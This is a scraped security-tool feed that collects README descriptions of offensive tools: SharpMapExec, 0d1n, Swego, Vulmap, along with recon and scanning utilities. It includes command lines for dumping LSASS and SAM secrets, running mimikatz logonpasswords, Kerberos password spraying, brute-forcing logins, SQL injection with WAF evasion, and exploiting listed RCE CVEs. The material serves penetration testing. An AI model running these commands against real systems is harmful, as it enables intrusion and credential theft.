Besides scanning for access it can be used to identify vulnerable configurations and exfiltrate data. The idea for the data exfiltration modules is to execute the least amount of necessary code on the remote computer. To accomplish this, the tool will download all the secrets to the loot directory and parse them locally.

You can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use Rubeus to import/ask for the ticket. If NTLM is specified, it tool will create threads and use SharpKatz to run SetThreadToken if an NTLM hash is specified, and if a password is specified, it will go with ordinary c# impersonation.

SharpMapExec.exe
usage:

--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET

Available Smb modules
/m:shares

--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET

Available WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sa m, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)

--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg

Smb

Can be used to scan for admin access and accessible Smb shares.

Modules;

/m:shares                                  (Scan enumerated shares for access)

WinRm

The beast. It has built-in Amsi bypass, JEA language breakout, JEA function analysis. Can be used for code execution, scaning for PsRemote access, vulnerable JEA endpoints, and data exfiltration.

Modules;

/m:exec /a:whoami                           (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)

Domain

Currently supports domain password spraying and to create a TGT for the current user that can be used with the /ticket parameter to get the current context.


Example usage

For easy or mass in-memory execution of C# assemblies



Kerberos password spraying then scanning for local admin access


 

This project supports scanning JEA endpoints and will analyze source code of non default commands and check if the endpoint was not configured for no-language mode.



Discover local admin password reuse with an NT hash.


 

Mass dump Lsass process with built-in Microsoft signed DLL and saves it to the loot folder



And much more!

Some scenarios with Kerberos will require you to sync your clock with the DC and set the DNS

net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

Acknowledgments

Projects that helped or are existing in this tool



0D1N v3.4 - Tool For Automating Customized Attacks Against Web Applications (Full Made In C Language With Pthreads, Have A Fast Performance)

$
0
0


0d1n is a tool for automating customized attacks against web applications. This tool is very faster because uses thread pool and C language.




0d1n is a tool for automating customized attacks against web applications. Video demo:



Tool functions:
  • Brute force login and passwords in auth forms

  • Directory disclosure ( use PATH list to brute, and find HTTP status code )

  • Test to find SQL Injection and XSS vulnerabilities

  • Test to find SSRF

  • Test to find COmmand injection

  • Options to load ANTI-CSRF token each request

  • Options to use random proxy per request

  • other functions...


To run and install follow this steps:

require libcurl-dev or libcurl-devel(on rpm linux based)

$ git clone https://github.com/CoolerVoid/0d1n/

You need libcurl to run, look the following to install::

$ sudo apt-get install libcurl-dev
or try libcurl4-dev... libcurl*

if rpm distro

$ sudo yum install libcurl-devel

To install follow this cmd:

$ cd 0d1n

$ make; sudo make install USER=name_your_user;

$ cd 0d1n_view; make; sudo make install USER=name_your_user;

Up the view server to look the reports online:

$ sudo 0d1n_view 

Now in other console you can run the tool:


$ 0d1n


to uninstall follow this steps:
$ cd 0d1n; sudo make uninstall

$ cd 0d1n_view; sudo make uninstall


Attack examples:

Brute force to find directory

$ 0d1n --host http://127.0.0.1/^ --payloads /opt/0d1n/payloads/dir_brute.txt --threads 500 --timeout 3 --log bartsimpsom4 --save_response

Note: You can change value of threads, if you have a good machine, you can try 800, 1200... each machine have a different context.

For SQL injection attack

$ 0d1n --host 'http://site.com/view/1^/product/^/' --payloads /opt/0d1n/payloads/sqli_list.txt --find_string_list /opt/0d1n/payloads/sqli_str2find_list.txt --log log1337 --tamper randcase --threads 800 --timeout 3 --save_response\n"

Note: Tamper is resource to try bypass the web application firewall

To brute force auth system

0d1n --host 'http://site.com/auth.py' --post 'user=admin&password=^' --payloads /opt/0d1n/payloads/wordlist.txt --log log007 --threads 500 --timeout 3\n"

Note: if have csrf token, you can use argv to get this token each request and brute...

Search SQLi in hard mode in login system with csrf token:

0d1n  --host "http://127.0.0.1/vulnerabilities/sqli/index.php?id=^" --payloads /opt/0d1n/payloads/sqli.txt --find_string_list /opt/0d1n/payloads/find_responses.txt --token_name user_token --log logtest_fibonaci49 --cookie_jar /home/user_name/cookies.txt --save_response --tamper randcase --threads 100

Note: Load cookies jar form browser and save in cookies.txt to load.


Notes External libs
  • To gain extreme performance 0d1n uses thread pool of posix threads, you can study this small library: https://github.com/Pithikos/C-Thread-Pool

  • The 0d1n uses OpenBSD/NetBSD functions to work with strings some thing like strlcat() and strlcpy() to prevent buffer overflow.


Project Overview on cloc
cooler@gentoo:~/codes$ cloc 0d1n/
937 text files.
532 unique files.
451 files ignored.

-------------------------------------------------------------------------------
Language files blank comment code
-------------------------------------------------------------------------------
JavaScript 361 9951 15621 52178
C 51 4986 4967 26642
C/C++ Header 30 1184 2858 4295
CSS 10 434 369 2142
HTML 7 59 0 1616
TeX 2 52 4 206
Markdown 3 81 0 137
make 4 36 9 130
Bourne Shell 2 0 0 4
-------------------------------------------------------------------------------
SUM: 487 16835 23846 91213
-------------------------------------------------------------------------------

Read the docs, and help menu when you execute "0d1n" binary...

Do you have any doubt about 0d1n? please create a issue in this repository, i can help you...


To study old versions look this following:

http://sourceforge.net/projects/odin-security-tool/files/?source=navbar



Grawler - Tool Which Comes With A Web Interface That Automates The Task Of Using Google Dorks, Scrapes The Results, And Stores Them In A File

$
0
0


Grawler is a tool written in PHP which comes with a web interface that automates the task of using google dorks, scrapes the results, and stores them in a file.


General info

Grawler aims to automate the task of using google dorks with a web interface, the main idea is to provide a simple yet powerful tool which can be used by anyone, Grawler comes pre-loaded with the following features.


Features
  • Supports multiple search engines (Google, Yahoo, Bing)
  • Comes with files containing dorks which are categorized in three categories as of now.
    • Filetypes
    • Login Pages
    • SQL Injections
    • My_dorks (This file is intentionally left blank for users to add their own list of dorks)
  • Comes with its own guide to learn the art of google dorks.



 

  • Built-in feature to use proxy (just in case google blocks you)



  • Saves all the scraped URL's in a single file (name needs to be specified in the input field with extension .txt).
  • Grawler can run in four different modes
    • Automatic mode: Where the Grawler uses dorks present in a file and stores the result.
    • Automatic mode with proxy enabled
    • Manual mode: This mode is for users who only want to test a single dork against a domain.
    • Manual mode with proxy enabled

Setup

Demo

Sample Result



Captcha Issue

Sometimes google captcha can be an issue, because google rightfully detects the bot and tries to block it, there are ways that I've already tried to avoid captcha like :

  • Using different user-agent headers and IP in a round-robin algorithm.
    • It works but it gives a lot of garbage URLs that are not of any use and in addition to that it's also slow, so I removed that feature.
  • Using free proxy servers
    • Free proxy servers are too slow and they often get blocked due to the fact that a lot of people use these free proxy servers for scraping.
  • Sleep function
    • This works up to some extent so I have incorporated it in the code.
  • Tor Network
    • Nope, doesn't work every time I tried it, a beautiful captcha was presented, so I removed this functionality too.

Solution
  • The best solution that I have found is to sign up for a proxy service and use it, it gives good results with less garbage URL's but it can be slow sometimes.
  • Use a VPN.

Contribute
  • Report Bugs
  • Add new features and functionalities
  • Add more effective google dorks (which actually works)
  • Workaround the captcha issue
  • Create a docker image(basically work on portability and usability)
  • Suggestions

Contact Me

You can contact me here A3h1nt regarding anything.



Kenzer - Automated Web Assets Enumeration And Scanning

$
0
0


Automated Web Assets Enumeration & Scanning

Instructions for running
  1. Create an account on Zulip
  2. Navigate to Settings > Your Bots > Add a new bot
  3. Create a new generic bot named kenzer
  4. Add all the configurations in configs/kenzer.conf
  5. Install/Run using -
    • ./install.sh -b [if you need kenzer-compatible binaries to be installed]
    • ./install.sh [if you do not need kenzer-compatible binaries to be installed]
    • ./run.sh [if you do not need installation at all]
    • ./service.sh [initialize it as a service post-installation]
  6. Interact with kenzer using Zulip client, by adding bot to a stream or via DM.
  7. Test @**kenzer** man as Zulip input to display available commands.
  8. All the commands can be used by mentioning the chatbot using the prefix @**kenzer**.

Built-in Functionalities
  • subenum - enumerates subdomains
  • portenum - enumerates open ports
  • webenum - enumerates webservers
  • headenum - enumerates additional info from webservers
  • asnenum - enumerates asn
  • dnsenum - enumerates dns records
  • conenum - enumerates hidden files & directories
  • urlenum - enumerates urls
  • subscan - hunts for subdomain takeovers
  • cscan - scan with customized templates
  • cvescan - hunts for CVEs
  • vulnscan - hunts for other common vulnerabilites
  • portscan - scans open ports
  • parascan - hunts for vulnerable parameters
  • endscan - hunts for vulnerable endpoints
  • buckscan - hunts for unreferenced aws s3 buckets
  • favscan - fingerprints webservers using favicon
  • vizscan - screenshots applications running on webservers
  • idscan - identifies applications running on webservers
  • enum - runs all enumerator modules
  • scan - runs all scanner modules
  • recon - runs all modules
  • hunt - runs your custom workflow
  • remlog - removes log files
  • upload - switches upload functionality
  • upgrade - upgrades kenzer to latest version
  • monitor - monitors ct logs for new subdomains
  • monitor normalize - normalizes the enumerations from ct logs
  • sync - synchronizes the local kenzerdb with github
  • kenzer <module> - runs a specific modules
  • kenzer man - shows this manual

COMPATIBILITY TESTED ON ARCHLINUX(x64) & DEBIAN(x64) ONLY
FEEL FREE TO SUBMIT PULL REQUESTS




GRecon - Your Google Recon Is Now Automated

$
0
0


GRecon (Greei-Conn) is a simple python tool that automates the process of Google Based Recon AKA Google Dorking The current Version 1.0 Run 7 Search Queries (7 Micro-Plugins) on the spicified Target Providing Awsome Results

Current Version Run Google Search Queries to find :

  • Subdomains
  • Sub-Subdomains
  • Signup/Login pages
  • Dir Listing
  • Exposed Docs
    • pdf...xls...docx...
  • WordPress Entries
  • Pasting Sites
    • Records in patsebin,Ghostbin...

Installation :

Use the package manager pip to install requirements

cd GRecon
python3 -m pip install -r requirements.txt
python3 Grecon.py

Referring to Redbull BugBounty Program Here here's a demo :



GRecon_Cli :

in Grecon_cli you can use your own Google Dorks (Still in Dev)



Swego - Swiss Army Knife Webserver In Golang

$
0
0


Swiss army knife Webserver in Golang. Keep simple like the python SimpleHTTPServer but with many features.


Usage

Help
$ ./webserver -help
web subcommand
-bind string
Bind Port (default "8080")
-certificate string
HTTPS certificate : openssl req -new -x509 -sha256 -key server.key -out server.crt -days 365
-gzip
Enables gzip/zlib compression (default true)
-help
Print usage
-key string
HTTPS Key : openssl genrsa -out server.key 2048
-password string
Password for basic auth, default: notsecure (default "notsecure")
-private string
Private folder with basic auth, default /tmp/SimpleHTTPServer-golang/src/bin/private (default "private")
-root string
Root folder (default "/tmp/SimpleHTTPServer-golang/src/bin")
-tls
Enables HTTPS
-username string
Username for basic auth, default: admin (default "admin")

run subcommand
Usage:
./webserver-l inux-amd64 run <binary> <args>

Packaged Binaries:

Web server over HTTP
$ ./webserver
Sharing /tmp/ on 8080 ...
Sharing /tmp/private on 8080 ...

Web server over HTTPS
$ openssl genrsa -out server.key 2048
Generating RSA private key, 2048 bit long modulus (2 primes)
..........................................+++++
.................................................................................................................+++++
e is 65537 (0x010001)

$ openssl req -new -x509 -sha256 -key server.key -out server.crt -days 365
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

$ ./webserver web -tls -key server.key -cert server.crt
Sharing /tmp/ on 8080 ...
Sharing /tmp/private on 8080 ...

Web server using private directory and root directory

Private folder on same directory
$ ./webserver-linux-amd64 web -private ThePrivateFolder -username nodauf -password nodauf
Sharing /tmp/ on 8080 ...
Sharing /tmp/ThePrivateFolder on 8080 ...

Different path for root and private directory
$ ./webserver-linux-amd64 web -private /tmp/private -root /home/nodauf -username nodauf -password nodauf
Sharing /home/nodauf on 8080 ...
Sharing /tmp/private on 8080 ...

Embedded binary (only on Windows)

List the embedded binaries:
C:\Users\Nodauf>.\webserver.exe run  
You must specify a binary to run
-args string
Arguments for the binary
-binary string
Binary to execute
-help
Print usage
-list
List the embedded files

Packaged Binaries:
Invoke-PowerShellTcp.ps1
mimikatz.exe
php-reverse-shell.php
plink.exe

Run binary with arguments:
C:\Users\Nodauf>.\webserver.exe run -binary mimikatz.exe -args "privilege::debug sekurlsa::logonpasswords"
....

Running binary this way could help bypassing AV protections. Sometimes the arguments sent to the binary may be catch by the AV, if possible use the interactive CLI of the binary (like mimikatz) or recompile the binary to change the arguments name.


Features
  • HTTPS
  • Directory listing
  • Define a private folder with basic authentication
  • Upload file
  • Download file as an encrypted zip (password: infected)
  • Download folder with a zip
  • Embedded files
  • Run embedded binary written in C# (only available on Windows)
  • Create a folder from the browser
  • Ability to execute embedded binary

Todo
  • Add feature for search and replace in embedded files (for fill the IP address for example)
  • JS/CSS menu to give command line in powershell, some gtfobins, curl, wget to download and execute


Censys-Python - An Easy-To-Use And Lightweight API Wrapper For The Censys Search Engine

$
0
0


An easy-to-use and lightweight API wrapper for the Censys Search Engine (censys.io). Python 3.6+ is currently supported.


Getting Started

The library can be installed using pip.

$ pip install censys

To configure your credentials run censys config or set both CENSYS_API_ID and CENSYS_API_SECRET environment variables.

$ censys config

Censys API ID: XXX
Censys API Secret: XXX

Successfully authenticated for your@email.com

Resources

Contributing

All contributions (no matter how small) are always welcome.


Development
$ git clone git@github.com:censys/censys-python.git
$ pip install -e ".[dev]"

Testing

Testing requires credentials to be set.

$ pytest


Vulmap - Web Vulnerability Scanning And Verification Tools

$
0
0


Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.

Vulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use "-m" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports "-f" batch target scanning, "-o" File output results and other main functions, Other functions Options Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.

Try to use "-a" to establish target types to reduce false positives, such as "-a solr"


Installation

The operating system must have python3, python3.7 or higher is recommended

  • Installation dependency
pip3 install -r requirements.txt
  • Linux & MacOS & Windows
python3 vulmap.py -u http://example.com

Options

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g. -u "http://example.com")
-f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f "/home/user/list.txt")
-m MODE, --mode MODE The mode supports "poc" and "exp", you can omit this option, and enter poc mode by default
-a APP, --app APP Specify a web app or cms (e.g. -a "weblogic"). default scan all
-c CMD, --cmd CMD Custom RCE vuln command, Other than "netstat -an" and "id" can affect program judgment. defautl is "netstat -an"
-v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v "CVE-2020-2729")
--list Displays a list of vulnerabilities that support scanning
--debug Debug mode echo request and responses
--delay DELAY Delay check time, default 0s
--timeout TIMEOUT Scan timeout time, default 10s
--output FILE Text mode export (e.g. -o "result.txt")

Examples

Test all vulnerabilities poc mode

python3 vulmap.py -u http://example.com

For RCE vuln, use the "id" command to test the vuln, because some linux does not have the "netstat -an" command

python3 vulmap.py -u http://example.com -c "id"

Check http://example.com for struts2 vuln

python3 vulmap.py -u http://example.com -a struts2
python3 vulmap.py -u http://example.com -m poc -a struts2

Exploit the CVE-2019-2729 vuln of WebLogic on http://example.com:7001

python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729
python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729

Batch scan URLs in list.txt

python3 vulmap.py -f list.txt

Export scan results to result.txt

python3 vulmap.py -u http://example.com:7001 -o result.txt

Vulnerabilitys List

Vulmap supported vulnerabilities are as follows

 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |
| Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |
| Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |
| Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |
| Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |
| Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |
| Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |
| Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |
| Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |
| Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |
| Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |
| Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |
| Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |
| Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |
| Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |
| Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |
| Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |
| Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |
| Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |
| Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |
| Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |
| Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |
| Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |
| Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |
| Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |
| Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |
| Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |
| Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |
| Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |
| Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
| Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
| Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
| Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |
| Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
| Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |
| RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
| RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |
| RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
| ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |
| ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+

Docker

docker build -t vulmap/vulmap .
docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com




Aura - Python Source Code Auditing And Static Analysis On A Large Scale

$
0
0


Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of the source code and implement secure coding practices with a focus on auditing 3rd party code such as python package dependencies
  • allow researches to scan code repositories on a large scale, create datasets and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Why Aura?

While there are other tools with functionality that overlaps with Aura such as Bandit, dlint, semgrep etc. the focus of these alternatives is different which impacts the functionality and how they are being used. These alternatives are mainly intended to be used in a similar way to linters, integrated into IDEs, frequently run during the development which makes it important to minimize false positives and reporting with clear actionable explanations in ideal cases.

Aura on the other hand reports on ** behavior of the code**, anomalies, and vulnerabilities with as much information as possible at the cost of false positive. There are a lot of things reported by aura that are not necessarily actionable by a user but they tell you a lot about the behavior of the code such as doing network communication, accessing sensitive files, or using mechanisms associated with obfuscation indicating a possible malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as antivirus, IDS, or firewalls that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to only python (target) source code and python version under which the tool is installed.
    • Aura can analyze both binary (or non-python code) and python source code as well. Able to analyze a mixture of python code compatible with different python versions (py2k & py3k) using the same Aura installation.
  • reporting:
    • Other SAST tools - Aims at integrating well with other systems such as IDEs, CI systems with actionable results while trying to minimize false positives to prevent overwhelming users with too many non-significant alerts.
    • Aura - reports as much information as possible that is not immediately actionable such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readable.
  • configuration:
    • Other SAST tools - The tools are fine-tuned to the target project by customizing the signatures to target specific technologies used by the target project. The overriding configuration is often possible by inserting comments inside the source code such as # nosec that will suppress the alert at that position
    • Aura - it is expected that there is little to no knowledge in advance about the technologies used by code that is being scanned such as auditing a new python package for approval to be used as a dependency in a project. In most cases, it is not even possible to modify the scanned source code such as using comments to indicate to linter or aura to skip detection at that location because it is scanning a copy of that code that is hosted at some remote location.

Installation
poetry install --no-dev -E full

Or just use a prebuild docker image sourcecodeai/aura:dev


Running Aura
docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses a so-called URIs to identify the protocol and location to scan, if no protocol is used, the scan argument is treated as a path to the file or directory on a local system.

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find most popular typosquatted packages (you need to call aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10



Authors & Contributors


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>